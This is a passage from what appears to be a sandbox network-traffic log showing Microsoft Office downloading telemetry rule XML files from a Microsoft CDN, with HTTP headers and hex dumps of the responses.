                                                                                                                                                                        2024-11-21 09:37:47 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        79192.168.2.64979213.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:47 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:47 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 408
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                        ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                        x-ms-request-id: ecab23c4-c01e-00ad-2963-3ba2b9000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093747Z-178bfbc474bscnbchC1NYCe7eg00000001eg000000005zb7
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:47 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        80192.168.2.64979313.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:47 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:47 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 469
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                        ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                        x-ms-request-id: 495def62-b01e-0098-458c-3acead000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093747Z-r1d97b99577n4dznhC1TEBc1qw0000000aa00000000011yh
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:47 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        81192.168.2.64979413.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:48 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:49 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 416
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                        ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                        x-ms-request-id: 1a8bda6d-001e-002b-2468-3b99f2000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093749Z-178bfbc474b9fdhphC1NYCac0n000000014000000000crcr
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:49 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        82192.168.2.64979513.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:48 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:49 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                        ETag: "0x8DC582B91EAD002"
                                                                                                                                                                        x-ms-request-id: 171aa64f-101e-005a-5b63-3b882b000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093749Z-178bfbc474bmqmgjhC1NYCy16c00000001dg0000000038tp
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:49 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        83192.168.2.64979613.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:49 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:49 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:49 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 432
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                        ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                        x-ms-request-id: de17e165-601e-0002-3161-3ba786000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093749Z-178bfbc474bq2pr7hC1NYCkfgg00000001c000000000a3v8
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:49 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        84192.168.2.64979713.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:49 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:49 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 475
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                        ETag: "0x8DC582BBA740822"
                                                                                                                                                                        x-ms-request-id: fafd7d00-e01e-00aa-3a63-3bceda000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093749Z-178bfbc474brk967hC1NYCfu6000000000zg00000000dsen
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:49 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        85192.168.2.64979813.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:50 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:50 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                        ETag: "0x8DC582BB464F255"
                                                                                                                                                                        x-ms-request-id: 02a30eba-b01e-0001-5b7b-3b46e2000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093750Z-178bfbc474bwh9gmhC1NYCy3rs000000018000000000f6px
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:50 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        86192.168.2.64979913.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:51 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:51 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:51 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                        ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                        x-ms-request-id: 302889d7-401e-0047-2e63-3b8597000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093751Z-178bfbc474bmqmgjhC1NYCy16c00000001eg000000001cyn
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:51 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        87192.168.2.64980013.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:51 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:51 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:51 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                        ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                        x-ms-request-id: 38897bff-401e-000a-368c-3a4a7b000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093751Z-1777c6cb754b7tdghC1TEBwwa40000000b30000000003w4w
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:51 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        88192.168.2.64980113.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:51 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:51 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                        ETag: "0x8DC582B984BF177"
                                                                                                                                                                        x-ms-request-id: cb785bac-301e-0000-6c8c-3aeecc000000
